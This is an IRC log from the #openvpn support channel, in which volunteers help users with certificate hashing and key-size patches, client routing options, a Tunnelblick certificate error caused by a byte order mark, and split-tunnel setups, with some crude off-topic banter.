it's a "poor man's" PKI to begin with 10:25 <@krzee> sure, but a nice sha256, like you said, would be a nice start 10:25 <@krzee> wont be colliding that any time too soon 10:26 <@krzee> i wonder if the hardened polarssl openvpn-nl can use those certs 10:26 <@krzee> i believe it doesnt even know what md5 / sha1 are 10:26 <@krzee> (polarssl) 10:27 * ecrist looks 10:29 -!- Devastator- [~devas@177.18.197.23] has quit [Changing host] 10:29 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 10:29 <+pekster> ecrist: Here's a patch against whatever the easy-rsa stuff installed by default in Windows under 2.3.0 is: http://pekster.sdf.org/misc/easy-rsa-sha256.patch 10:30 <+pekster> I'd presume it's the same cnf file for *nix too 10:30 <+pekster> (that bit about doing it under [req] is also very required for the client (non-CA) certs too 10:31 -!- jthunder [~jthunder@184.151.222.164] has joined #openvpn 10:31 <+pekster> Upping the default key size to 2048 is probably also wise if you're making security-concious upgrades ;) 10:32 <+pekster> Reference: talk ID 5275 from http://mirror.fem-net.de/CCC/29C3/mp4-h264-HQ/ (really good talk if you're into RSA factoization attacks, btw. They're funny speakers to boot) 10:32 <@vpnHelper> Title: Index of /CCC/29C3/mp4-h264-HQ/ (at mirror.fem-net.de) 10:32 <@ecrist> pekster: is that against git? 10:32 <@krzee> damn i forgot to bookmark that page, thanks =] 10:32 <+pekster> No, whatever was installed locally. I'll get you a proper source patch if you'd like 10:33 <@ecrist> pretty please 10:36 <+pekster> ecrist: What's with all the various versions of openssl .cnf files in the master? Does the change need to go in all of them? 10:37 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 10:37 <+pekster> Yea, I guess so, due to that whichopensslcnf deal 10:37 <+pekster> k 10:38 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 264 seconds] 10:44 <@ecrist> pekster: I took over recently, so I have not a clue 10:44 <@ecrist> pekster: pm? 10:44 <+pekster> Sure 10:46 <+pekster> ecrist: I split the patches out against current git master, one for the sha256 change, and another for the keysize -> 2048 bit. http://pekster.sdf.org/misc/ovpn-patches/ 10:46 <@vpnHelper> Title: Index of /misc/ovpn-patches (at pekster.sdf.org) 10:49 -!- jthunder_ [~jthunder@184.151.222.164] has joined #openvpn 10:51 -!- jthunder [~jthunder@184.151.222.164] has quit [Ping timeout: 272 seconds] 10:51 -!- jthunder_ is now known as jthunder 10:55 <+pekster> krzee: Re: PolarSSL, the features list supports all official SHA2 varients, so that change shouldn't break any embedded system that's built with a non-ancient version 10:57 <+pekster> And if it is that ancient, people can run my patch in reverse on their local copy :P 10:59 -!- igor_ [~igor@pd907e599.dip0.t-ipconnect.de] has quit [Quit: leaving] 11:01 -!- APTX [~APTX@unaffiliated/aptx] has quit [Quit: Farewell] 11:01 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 11:04 -!- zz_AsadH is now known as AsadH 11:06 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 244 seconds] 11:07 -!- jthunder [~jthunder@184.151.222.164] has quit [Ping timeout: 272 seconds] 11:13 <+pekster> ecrist: Oh, hold off on that patch. 2 things I had to dig in the scripts to see, at least under the 2.0 Linux stuff. THere's some hard-coding going on of the md selection in the command, and a 2nd cnf section for the server. So, more changes needed :( 11:18 -!- troker [~troker@174.142.225.243] has joined #openvpn 11:20 < troker> Hey all, is there a command that I can run on my OpenVPN client that negates all push options? Im trying to set up my router as a client but ALL my traffic is getting routed through the VPN, the push options are here: PUSH_REPLY,topology subnet,route-gateway 10.200.4.1,dhcp-option DNS 208.67.222.222,dhcp-option DNS 208.67.220.220,ping 10,ping-restart 90,redirect-gateway def1,ifconfig 10.200.5.15 255.255.252.0' 11:20 < troker> I think the redirect-gateway def1 is the culprit 11:21 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 11:22 <+pekster> troker: Perhaps you want --route-nopull ? 11:22 < troker> pekster: Already have that in my config 11:23 < troker> And I *used* to get routes to 0.0.0.0 (kinda redundant) but I'm not getting them anymore so the --route-nopull I think is working 11:23 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:23 < troker> I see this line "openvpn[36893]: SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)" 11:23 < troker> Is that me requesting a push? Can I just not request the push somehow 11:24 <+pekster> You need that to get your IP, unless you know what that is going to be ahead-of-time 11:25 < troker> Mhm, ok - It looks like that my original idea may be wrong though, further inspection turns up: openvpn[36893]: Options error: option 'redirect-gateway' cannot be used in this context. So I guess the redirect-gateway isn't the culprit 11:25 <+pekster> At 'verb 4' you should see some message in the log about inhibiting the action of each of the route-related pushes 11:25 < c3vin> so when I browse to openvpn server's URL, windows downloads client and certs automatically 11:26 < c3vin> is there a way I can do the same in centos? 11:26 <+pekster> c3vin: That's not a feature OpenVPN provoides. Either the owner did some clever scripting of download options, or you're using the commercial "Access Server" product which is not part of the open-source OpenVPN program we support here 11:27 <+pekster> !as 11:27 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 11:27 -!- raidz [~raidz@openvpn/corp/admin/andrew] has left #openvpn [] 11:27 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 11:27 -!- mode/#openvpn [+o raidz] by ChanServ 11:27 < c3vin> is client connect part of access server? 11:28 <+pekster> Sounds like it, yes. The open-source version does not have a "client" in the name; it's the same installation for both server and client, you just configure them to take on whatever role you need 11:28 <+pekster> !download 11:28 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 11:28 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 11:29 -!- dazo_afk is now known as dazo 11:32 < troker> pekster: am I missing something here? maybe Im implementing it wrong: http://pastebin.com/raw.php?i=ekA88nMT 11:33 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 276 seconds] 11:34 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 11:36 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn 11:37 -!- p3rror [~mezgani@2001:0:53aa:64c:cb0:1eff:d606:ec34] has joined #openvpn 11:38 <+pekster> troker: Besides the fact that your route command is apparently failing 3 lines from the bottom, that looks normal to me. The redirect-gateway isn't processed since you're not pulling routes 11:39 < troker> pekster: mum, ok thanks for the second set of eyes & the ideas. I *think* that error is because I keep bringing up and tearing down the interface, so the route is already there… Any other thoughts as to where I might look? 11:40 <+pekster> What's the problem? Nowhere in that setup is it messing with your gateway 11:40 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 11:42 < troker> So when the connection comes up (the logs your seeing) everyone is ok. Next step is to add that connection to an interface in pfsense to make it usable and routable by the nanoBSD OS and the routers clients. However as SOON as I do that (create the interface) *all* traffic gets pushed up the client VPN. Im guessing its a global route too because it totally breaks the (functioning and entirely separate) VPN that I use to get into my home network. 11:42 < troker> I was thinking that maybe it had a route passed to it (like 0.0.0.0) and as soon as I created an interface it was able to act on that route 11:43 < troker> but it seems like the issue might be elsewhere 11:43 <+pekster> You need to check your upscript for errors then 11:43 <+pekster> Anything that's happening to your routing is happening there, not part of openvpn's connection process or parsing of options it gets from the VPN peer 11:43 -!- p3rror [~mezgani@2001:0:53aa:64c:cb0:1eff:d606:ec34] has quit [Remote host closed the connection] 11:44 <+pekster> ie: up_script = '/usr/local/sbin/ovpn-linkup' 11:46 < troker> would bypassing the up_script have any effect? 11:47 <+pekster> The effect would be that it won't get run when the VPN connection is established 11:47 <+pekster> What this means for you I have no idea since that script can do anything it's told 11:51 < troker> pekster: Thoughts on this? The redirect-gateway directive fails because it isn't bound to any interface, but when I do bind it to one the directive takes over? 11:52 <+pekster> Define "takes over" ? If you don't use --route-nopull, you're going to get the exact behaviour described in the manpage under --redirect-gateway 11:54 < troker> Ok, so in here (http://pastebin.com/raw.php?i=ekA88nMT) at the very top I have my flags that Im running openvpn with - the route-nopull should… not pull routes (correct?) -- so why then at the bottom of my logs am I seeing references to redirect-gateway? Wouldn't the route-nopull block that right off the bat? --- Jan 29 12:26:29 pfsense openvpn[23808]: Options error: option 'redirect-gateway' cannot be used in this context 11:55 <+pekster> It is blocking it. That's what that message says. It tells you "The server sent me this option, but in the context you've requested, I'm not going to process it." 11:56 < troker> Ahhh ok, thank you, that makes things much clearer. I was under the impression that it was referring to the fact that it had no interface to bind to so I couldn't redirect traffic through it. 11:58 -!- AsadH is now known as zz_AsadH 12:04 -!- b1rkh0ff [~b1rkh0ff@31.176.156.222] has quit [Ping timeout: 240 seconds] 12:05 -!- b1rkh0ff [~b1rkh0ff@31.176.147.137] has joined #openvpn 12:19 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has quit [Ping timeout: 248 seconds] 12:20 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has joined #openvpn 12:21 < cirdan> hey any chance I can get some help with tunnelblick in here? I got a working config other places not working on the latest beta. It tells me it can't find my ca.crt even if I give it a full path 12:24 <@krzee> i just tell it that i have configs, then i dump everything into the folder it gives me and rename it like it says 12:25 < cirdan> I did that and it won't work 12:25 < cirdan> sad that i got openvpn working on my iphone before my mac 12:25 <@krzee> did the config simply say "ca ca.crt" 12:25 <@krzee> or did it have full path? 12:25 < cirdan> either. neither work 12:26 <@krzee> sad? i think thats awesome, the ios client is very new 12:26 < cirdan> sad that it's not working on os x 12:26 <@krzee> need the latest beta? 12:26 < cirdan> got it 12:26 <@krzee> but do you need it? 12:26 <@krzee> beta generally means less tested 12:27 < cirdan> i'm on 10.8 iirc it was reccomended 12:27 <@krzee> try submitting a ticket to them 12:27 < cirdan> 2013-01-29 13:26:56 us=171918 Cannot load CA certificate file /Library/Application Support/Tunnelblick/Users/chris/lorien.tblk/Contents/Resources/ca.pem path (null) (SSL_CTX_load_verify_locations) (OpenSSL) 12:27 <@krzee> i dont run 10.8 or the latest beta 12:27 <@krzee> well, do you see the crt there? 12:27 < cirdan> that was with the full path quoted 12:28 < cirdan> err 12:28 < cirdan> wait a sec 12:29 -!- troker [~troker@174.142.225.243] has left #openvpn [] 12:29 < cirdan> yup it exists there 12:30 <@krzee> does the md5 match? 12:31 <+pekster> That's a somewhat strange path, but okay. When I used Tunnelblick it more or less intended you to keep ca certs like that either under /Users somewhere, or directly in the Tunnelblick.app package when you shipped pre-packaged cert files 12:31 < cirdan> yes they are the same 12:31 <@krzee> you have a choice, keep it for the user only or the entire system 12:31 < cirdan> pekster: now it creates a "shadow copy" it tells me 12:31 <+pekster> That's likely why it can't find it, since you need to call the program as root to get the right perms 12:32 <+pekster> Vista did the same thing before they "fixed" it in SP1. Try checking for that file as the root user in a terminal 12:32 < cirdan> it asks for root if i modify in my home config 12:32 < cirdan> it exits and you need root ro read the dir 12:32 <+pekster> It may not exist if apple's doing some goofy copy in your personal user view or something 12:33 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has joined #openvpn 12:33 <@krzee> try importing it for the user instead? 12:33 < cirdan> It is a user config 12:34 <@krzee> ok then try the other 12:34 <+pekster> But according to that path, it's stored under the "Application Support" in the system library. Maybe things are symlinked or hardlinked in screwy ways, but then you have a lot more stuff messed up that I don't even want to touch :P 12:34 <@krzee> its a tunnelblick problem, we dont know the solution, but you might stumble onto a workaround (or you could just go file a ticket with them) 12:34 < cirdan> yeah 12:34 < cirdan> gonna try the other beta they have posted 12:35 <+pekster> I've generally been impressed with how Tunnelblick handled itself, but I've been out of the loop since $oldjob when I was maintaining pre-packaged "install and connect" type releases 12:35 <+pekster> In that regard, they did better than any other platform I've seen with that kind of support 12:36 <@krzee> i used to dislike tunnelblick, but in the last year or 2 i gave it another try and have had nothing but good experience with it since 12:36 <+pekster> Drag to Applications folder, click OK on the permissions dialog, enter your password, and you're done 12:36 <@krzee> also better interface for managing multiple tunnels (imo) 12:36 < cirdan> you don't even need to drag it anymore. if you open it from the image it'll ask to copy itself and restart itself 12:37 <@krzee> i also like that it directly imports configs instead of trying to help you generate one 12:37 <+pekster> Well, the magic I did was in pre-packging the configs inside the .app folder 12:37 <+pekster> They have a specific method to declare the options you need, the config file, and all the supporting certs/keys/whatever 12:37 <+pekster> It's super-easy, if you follow their guidelines 12:38 <+pekster> As soon as it's installed, the user has immediate access to whatever you've configured it to support (in my case, a VPN to $oldjob's netwnork) 12:41 <+pekster> This: https://code.google.com/p/tunnelblick/wiki/cCusDeployed#How_to_Make_a_Deployed_Version 12:41 <@vpnHelper> Title: cCusDeployed - tunnelblick - Deploying Tunnelblick - OpenVPN GUI for Mac OS X - Google Project Hosting (at code.google.com) 12:42 < cirdan> yeah other beta wont work 12:43 <+pekster> cirdan: Sounds like a problem with "views" on the filesystem depending on what user is actually invoking openvpn, or possibly a chroot issue if your config or Tunnelblick now tries to add that automatically 12:45 <+pekster> If the file is there and you can verify this by running the config passed to openvpn directly on a command prompt as root, then you should file the bug downstream with Tunnelblick. If not, you need to find your file first ;) 12:55 <@krzee> watching http://mirror.fem-net.de/CCC/29C3/mp4-h264-HQ/29c3-5275-en-facthacks_h264.mp4 and just waiting for a joke about "minding your p's and q's" 12:56 < cirdan> yeah doesn't work on the command line either, which makes sense 12:56 < cirdan> but root can read the files fine 12:56 < cirdan> so can I atm 12:58 <+pekster> krzee: Oh no, the jokes are much more blunt than that. Just wait until you hear about the secure cloud storage solutions they reference near the end 12:59 <+pekster> cirdan: Calling openvpn directly from the prompt also failed? Citing the same error to the file, that you can 'ls -l "$file"' and 'less "$file"' on? 13:00 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 264 seconds] 13:00 -!- krzie [nobody@hemp.ircpimps.org] has joined #openvpn 13:00 -!- krzie [nobody@hemp.ircpimps.org] has quit [Changing host] 13:00 -!- krzie [nobody@openvpn/community/support/krzee] has joined #openvpn 13:00 -!- mode/#openvpn [+o krzie] by ChanServ 13:01 <+pekster> krzie: Bad time to ping out. http://fpaste.org/wNw7/raw/ 13:01 <@krzie> nice i wasnt sure you caught what i said or not 13:02 < cirdan> wtf. so... my ca cert was a utf8 file and it was being rejected?!? 13:03 < EugeneKay> BOM enabled? 13:03 < cirdan> i guess so 13:03 < EugeneKay> No surprise there. 13:03 <@krzie> BOM? 13:03 < cirdan> bill of materials :-) 13:04 < cirdan> why should it matter if there is a bom? 13:04 < EugeneKay> Byte Order Mark, aka  13:04 <@krzie> beer or marijuana :D 13:04 <@krzie> aka, what to bring to my parties 13:04 < EugeneKay> Because /nothing/ knows to look for & strip BOMs 13:05 < EugeneKay> krzie - "or"? :'-( 13:05 <@krzie> hey im not TOO demanding 13:05 < cirdan> ok one last question, is there any way, while using a tun device, or make it act like tap, aka share the same subnet with my home network? 13:06 < EugeneKay> You can add a second IP to your eth interfface and do 1-to-1 NATing 13:06 < EugeneKay> But really, just set it up to route properly. 13:06 < cirdan> I hate it routing properly, was just wondering 13:07 < EugeneKay> Then you don't understand networking :-p 13:07 <@krzie> theres also a special feature built into openvpn for this 13:07 < cirdan> just a minor annoyance 13:07 <@krzie> i have no idea why, but there is 13:07 < EugeneKay> There is? o.O 13:07 <@krzie> i strongly recommend not using it 13:07 <@krzie> !nathack 13:07 <@vpnHelper> "nathack" is see https://community.openvpn.net/openvpn/wiki/NatHack for info on how to solve the problem when you need !route_outside_ovpn but cant add a route to the gateway or the lan machines 13:07 < EugeneKay> Oh, that. 13:07 <@krzie> hmm wheer is it 13:07 <@ecrist> pekster: incoming from freenode staff 13:07 <@krzie> theres an actual --option 13:08 <+pekster> k 13:08 <@krzie> !factoids 13:08 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 13:08 < cirdan> that's not it. I just prefer my devices having the same ip lan or vpn, no worries 13:08 < EugeneKay> Set up DNS for them then 13:08 < EugeneKay> No more worrying about IPs 13:08 <+pekster> Maning your own fake tld too ;) 13:09 < cirdan> --topology you mean? 13:09 < EugeneKay> Nonsense, you can run it in public DNS 13:09 <@krzie> !samesubnet 13:09 <@vpnHelper> "samesubnet" is (#1) clients can not connect to a server pushing its lan if on the same subnet. you can only reach your subnet on layer2 or through your gateway, when you create a route for it you will try to reach your gateway over the vpn which dies because you cant reach your gateway or (#2) you can use --client-nat if on 2.3 to work around changing the subnet, but you should still just change the 13:09 <+pekster> Well, I keep rfc1918 out of my public zones :P 13:09 <@vpnHelper> subnet 13:09 <@krzie> EugeneKay, that ^ 13:09 < EugeneKay> Oh, 2.3 13:10 <@krzie> yep, not sure why they built the nathack into openvpn, but they did 13:10 < EugeneKay> Sadists. 13:12 <+pekster> I find it ironic that NAT-friendly features are added at a time when we want to encourage IPv6 usage globally :P (not just openvpn, mind you.) 13:12 * krzie throws holy water at pekster's ipv6 13:12 -!- pekster [~rewt@openvpn/user/pekster] has quit [Changing host] 13:12 -!- pekster [~rewt@openvpn/community/support/pekster] has joined #openvpn 13:12 -!- ServerMode/#openvpn [+v pekster] by zelazny.freenode.net 13:12 -!- krzie is now known as krzee 13:13 -!- mode/#openvpn [+o pekster] by ChanServ 13:14 <@krzee> o/ 13:15 < cirdan> oh EugeneKay, the reason i'm confused about the BOM issue is that there is still the --BEGIN-- and end lines... 13:15 < cirdan> ah well 13:15 * cirdan goes and changes the default on bbedit... 13:20 < EugeneKay> Standards are standards 13:20 < EugeneKay> And BOM is a bad one :-p 13:22 < cirdan> well it works now, woot 13:25 < rob0> Wow, that holy water is powerful stuff! 13:26 < cirdan> it wasn't water... 13:33 <@krzee> lol 13:36 < fys> god my last job warped my perception of dubstep 13:36 < fys> i can't hear skrillex without thinking of a strip club 13:37 * krzee puts a $1 in fys' bra 13:37 < fys> haha 13:37 < fys> ;) 13:40 <@krzee> pekster, lol this video is getting funny 13:47 <@pekster> They're pretty smart folks, and don't mind having fun while talking about the potentially dry topic of RSA math 13:51 -!- vpopov [~happylife@149.62.17.217] has quit [Ping timeout: 255 seconds] 13:53 < fys> ugh 13:53 < fys> I'm in hell. 13:53 <@krzee> listen to dubstep 13:53 <@krzee> it'll make you think of boobies 13:53 < fys> I'm stuck with 4 servers in the 192.168.xxx.xxx range. 13:53 < fys> :| 13:54 < fys> One of which is 192.168.1.0/24 13:54 < fys> and I can't change it. 13:54 < fys> When my developer is on the road, he's fucked half the time. 13:55 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 13:57 < rob0> stuck? 13:58 < fys> Yeah. 13:58 < fys> It's on a hosted VMware system I don't have console access to 13:58 <@pekster> fys: My solution to that (overlapping rfc1918 networks) is to fire up a tiny VM that serves my laptop a unique range and let the upstream device deal with NAT/upstreamDNS, etc. No more overlap, and functional DNS by way of NAT and dnsmasq 13:58 < fys> behind a shitty fortigate appliance. 13:58 <@pekster> Of course, that assumes you have full control over the remote floating end, and have access too a bootable distro as a VM :\ 13:58 < rob0> My solution is to do proper network design from the beginning ;) 13:59 < fys> I didn't design it. 13:59 < fys> Ass. 13:59 < rob0> or, go back and fix it later 13:59 < fys> Yeah, again. 13:59 < fys> Can't. 13:59 < rob0> sucks to be you 13:59 < fys> Yes it does. 13:59 < fys> At least from this problem. 14:00 < fys> Whoever designed this network was a fucking idiot. 14:00 < rob0> Many network designers are. Certainly not unusual. 14:00 <@krzee> ive had to tell a few people "the last guy did not think this far ahead, i can duct tape it together and wish the next guy good luck, or i can go back and spend more time doing it over again clean and correctly, the choice is yours" 14:00 <@krzee> most people elect to have it done correctly 14:01 < fys> krzee: The thing that infuriates me the most is that the Fortigate appliance has VPN shit built-in so they should have thought about VPN and IP ranges when picking shit. 14:01 < fys> :| 14:01 < fys> "HMMM THIS NETWORK MIGHT NEED VPN... 192.168.1.0/24 IT IS!" 14:02 < fys> Fucking amateurs. 14:02 <@krzee> lol 14:02 < fys> I'm -far- from a network guy myself. 14:02 < fys> but even I know not to do that. 14:02 < fys> heh 14:06 -!- pekster [~rewt@openvpn/community/support/pekster] has quit [Quit: Disconnecting to play with RA/PD on the ISP link] 14:12 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Quit: Wychodzi] 14:16 < EugeneKay> Boobies? 14:16 * EugeneKay perks up 14:17 -!- jthunder [~jthunder@70.28.245.121] has joined #openvpn 14:23 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 14:28 <@novaflash> boobs? 14:28 <@novaflash> what? 14:29 <@novaflash> anyone know why this error would popup with openvpn 2.3.0 on win 2008 r2 x64 on the TAP driver? http://fiber.xs4all.nl/TAP.png 14:31 <@krzee> #10? 14:31 -!- rocco1 [~rocco@2001:4dd0:fd53:101:1d09:eea4:2a2:3f7] has joined #openvpn 14:31 <@novaflash> *shrugs* i guess the guy wanted a few tap adapters 14:31 < rocco1> !clientlan 14:31 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for 14:31 <@vpnHelper> a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 14:32 < rocco1> !route_outside_openvpn 14:32 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png 14:33 <@krzee> novaflash, ild prolly use the bat to remove all and start over 14:34 <@krzee> i doubt he actually has 10, likely has fubar'ed things trying to make 1 work 14:34 <@novaflash> does 2.3.0 even HAVE the bat these days? i thought they created a separate installer for tap now? 14:34 <@novaflash> but yeah you're probably right 14:34 <@novaflash> i just threw the message out here hoping someone might go oh yeah, that's a known thing 14:34 <@krzee> sucks pekster left, he pulled them out of the installer 14:34 <@novaflash> but i guess not 14:34 <@novaflash> so you're saying 14:35 <@novaflash> he pulled out? 14:35 <@krzee> the bats you are looking for are somewhere 14:35 <@krzee> i dunno more than that 14:35 <@novaflash> haha 14:35 <@krzee> sorry, but hopefully that helps ya 14:35 <@novaflash> if they're there, i can find them 14:35 <@novaflash> don't worry mate 14:35 <@novaflash> it's not my server that's got the problem 14:36 <@novaflash> i was just curious about the error 14:36 <@novaflash> it kind of looks to me like he used an old installer first 14:36 <@novaflash> then ran the new installer 14:36 <@novaflash> maybe the old driver is still in there 14:39 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 276 seconds] 14:41 -!- genghi [~Adium@p50899BDD.dip.t-dialin.net] has quit [Quit: Leaving.] 14:48 -!- jthunder [~jthunder@70.28.245.121] has quit [Ping timeout: 272 seconds] 14:51 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 272 seconds] 14:54 -!- pekster [~rewt@openvpn/community/support/pekster] has joined #openvpn 14:57 < pekster> No IPv6 for me, still :( 15:00 < c3vin> I think access server is fucking up my life right now 15:00 < c3vin> can't get openvpn client on centos to connect 15:00 < EugeneKay> !as 15:00 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 15:00 < c3vin> oh ty 15:01 -!- jthunder [~jthunder@70.28.245.121] has joined #openvpn 15:01 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 15:05 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:07 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 15:11 -!- KaiForce [~chatzilla@adsl-70-228-88-232.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0.1/20130116073211]] 15:16 -!- syoma [~syoma@186.34.232.222] has joined #openvpn 15:17 < syoma> Hello 15:17 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 15:18 < syoma> guys, I've the following problem: 15:18 < syoma> "This computer's apparent public IP address was not different after connecting to fw1-TCP-1196-fernando.ormeno. It is still 190.44.118.93. 15:18 < syoma> This may mean that your VPN is not configured correctly." 15:18 < syoma> my config is OK 15:19 < syoma> I use tunnelblick client... somebody can help me please 15:19 < pekster> !goal 15:19 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 15:20 < syoma> pekster: hello man 15:22 -!- bjh4 [~bjh4@12.239.198.1] has joined #openvpn 15:22 -!- bjh4 [~bjh4@12.239.198.1] has quit [Remote host closed the connection] 15:23 -!- brute11k1 [~brute11k@89.249.231.124] has joined #openvpn 15:24 -!- PryMar56 [~prymar@cpe-98-149-139-90.socal.res.rr.com] has joined #openvpn 15:24 -!- brute11k [~brute11k@89.249.231.124] has quit [Ping timeout: 246 seconds] 15:27 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 244 seconds] 15:30 -!- syoma [~syoma@186.34.232.222] has quit [Quit: leaving] 15:32 -!- Saviq_ [~Saviq@194.168.195.98] has joined #openvpn 15:35 -!- Saviq_ [~Saviq@194.168.195.98] has quit [Client Quit] 15:41 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 15:41 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Read error: Connection reset by peer] 15:44 -!- jthunder_ [~jthunder@70.28.245.121] has joined #openvpn 15:45 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 15:45 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 15:45 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 15:47 -!- jthunder [~jthunder@70.28.245.121] has quit [Ping timeout: 272 seconds] 15:47 -!- jthunder_ is now known as jthunder 15:54 -!- nonotza [~nonotza@rrcs-50-74-239-162.nyc.biz.rr.com] has quit [Quit: nonotza] 15:54 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 272 seconds] 15:56 -!- zeshoem [~zee@198-84-231-11.cpe.teksavvy.com] has quit [] 16:04 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds] 16:13 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 16:15 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:16 < wykydtron> I am trying to setup split tunneling, I am not familar with setting up the server side route. How would I set it up so the client can seen the VPN server samba folders? 16:17 < wykydtron> I commented out push "redirect-gateway def1" in server.conf and clientside i added: route [serverip] 255.255.255.0 vpn_gateway 16:25 -!- dazo is now known as dazo_afk 16:33 < pekster> wykydtron: Are you trying to expose a LAN network behind the server, or just the virutal VPN subnet itself? 16:46 < rob0> "Samba folders" is a red herring. If the IP routing works, Samba can work with IP addresses. If WINS and nmbd(8) work, Samba can also work with names. #samba is down the hall if you're stuck on that. 16:48 -!- jthunder [~jthunder@70.28.245.121] has quit [Quit: jthunder] 16:55 < wykydtron> pekster just virtual vpn subnet. Samba is setup fine, just not sure how to properly setup split tunnel 16:56 < pekster> What do you need a split tunnel for if you already have routing working for a unique virtual VPN network? Sounds like you're all done 16:58 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Remote host closed the connection] 16:59 < rob0> If you can ping through the tunnel, openvpn is fine. 17:01 < wykydtron> Maybe I'm approaching this the wrong way. 17:02 < wykydtron> If I have full OpenVPN setup on the server with samba setup, the client can see the folders. However, I do not what the client routing all internet traffic to VPN. I only want the client to see the servers shared folders through the VPN. 17:07 < pekster> OpenVPN is a routing and encryption protocol, not a file-sharing protocol. THat's like saying that you need to buy a green network cable or you can't connect to the PC on your co-worker's desk: they're unrelated things. You can use discovery protocols (WINS, DNS, DFS, etc) across a VPN just like you can send a ping across any color Ethernet cable 17:07 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 245 seconds] 17:07 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Quit: Computer has gone to sleep.] 17:08 < rob0> If you don't want --redirect-gateway, why is it in your config? 17:08 < rob0> oh. "I commented out push "redirect-gateway def1" in server.conf ..." 17:09 < rob0> so what's wrong now? 17:09 < rob0> "split tunnel" means what? 17:10 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 17:11 < wykydtron> rob0: instead of using redirect-gateway paremeter, i thought to use the route directive, specifying net_gateway or vpn_gateway perhaps I misunderstood how these work. 17:11 <@krzee> wykydtron, a vpn is like an ethernet cable, you dont have to do more than a point to point link, but you CAN choose to route a lan or the entire internet (or anything between) over it 17:11 <@krzee> do you need to access a lan over the vpn? or just something on the vpn server? 17:12 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 17:13 < wykydtron> krzee: I would say lan, I'd like to have my workstation and laptop map a network drive. 17:13 <@krzee> 2 machines on the client side, but only the server itself on the server side? 17:13 < wykydtron> I have a script monitoring file changes to these specific files I want to access, before someone suggested simply Dropbox but that does not work for my specific application 17:14 < wykydtron> krzee yes sir 17:14 <@krzee> !sample 17:14 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting 17:14 <@krzee> !clientlan 17:14 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled 